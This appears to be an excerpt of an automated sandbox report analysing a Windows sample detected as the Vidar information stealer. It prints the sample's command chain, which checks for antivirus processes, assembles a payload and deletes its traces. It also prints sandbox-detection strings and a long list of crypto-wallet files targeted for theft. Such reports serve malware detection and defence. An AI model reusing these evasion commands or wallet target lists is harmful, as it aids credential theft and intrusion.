          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: dbghelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: ntshrui.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: linkinfo.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: Google Drive.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: mNPTwHOuvT.exeStatic file information: File size 1352826 > 1048576
          Source: mNPTwHOuvT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
          Source: mNPTwHOuvT.exeStatic PE information: real checksum: 0x155729 should be: 0x14ba81
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00220315 push cs; retn 0021h11_2_00220318
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F0DE6 push ecx; ret 11_2_001F0DF9

          Persistence and Installation Behavior

          barindex
          Drops PE files with a suspicious file extension
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\424372\Fine.comJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\424372\Fine.comJump to dropped file

          Boot Survival

          barindex
          Monitors registry run keys for changes
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002626DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_002626DD
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001EFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_001EFC7C
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Fine.com, 0000000B.00000003.2441646535.00000000040BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comAPI coverage: 3.9 %
          Source: C:\Windows\SysWOW64\timeout.exe TID: 3596Thread sleep count: 91 > 30
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_0023DC54
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0024A087
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0024A1E2
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_0023E472
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_0024A570
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0020C622 FindFirstFileExW,11_2_0020C622
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002466DC FindFirstFileW,FindNextFileW,FindClose,11_2_002466DC
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00247333 FindFirstFileW,FindClose,11_2_00247333
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_002473D4
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_0023D921
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001D5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_001D5FC8
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\424372\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\424372Jump to behavior
          Source: XLFUAS.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: XLFUAS.11.drBinary or memory string: discord.comVMware20,11696428655f
          Source: XLFUAS.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: global block list test formVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: msedge.exe, 00000013.00000003.2669700148.000039F800334000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: XLFUAS.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: XLFUAS.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: XLFUAS.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: XLFUAS.11.drBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: XLFUAS.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: msedge.exe, 00000013.00000002.2735012514.000002EC39C53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: XLFUAS.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: XLFUAS.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: XLFUAS.11.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: AMC password management pageVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*B
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: XLFUAS.11.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: XLFUAS.11.drBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: XLFUAS.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHW
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: XLFUAS.11.drBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: XLFUAS.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: XLFUAS.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024F4FF BlockInput,11_2_0024F4FF
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001D338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_001D338B
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F5058 mov eax, dword ptr fs:[00000030h]11_2_001F5058
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002320AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,11_2_002320AA
          Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00202992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00202992
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_001F0BAF
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F0D45 SetUnhandledExceptionFilter,11_2_001F0D45
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_001F0F91

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: Process Memory Space: Fine.com PID: 1440, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00231B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00231B4D
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001D338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_001D338B
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023BBED SendInput,keybd_event,11_2_0023BBED
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023EC6C mouse_event,11_2_0023EC6C
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Lou Lou.cmd & Lou.cmdJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 424372Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SYDNEY" Webmasters Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Hero + ..\Spell + ..\Pensions + ..\Wants + ..\Mars UJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\424372\Fine.com Fine.com UJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HD2DTRQQ" & exitJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002314AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_002314AE
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00231FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00231FB0
          Source: Fine.com, 0000000B.00000000.2087026390.0000000000293000.00000002.00000001.01000000.00000009.sdmp, Pmid.0.dr, Fine.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: Fine.comBinary or memory string: Shell_TrayWnd
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F0A08 cpuid 11_2_001F0A08
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0022E5F4 GetLocalTime,11_2_0022E5F4
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0022E652 GetUserNameW,11_2_0022E652
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0020BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_0020BCD2
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

          Stealing of Sensitive Information

          barindex
          Yara detected Vidar stealer
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
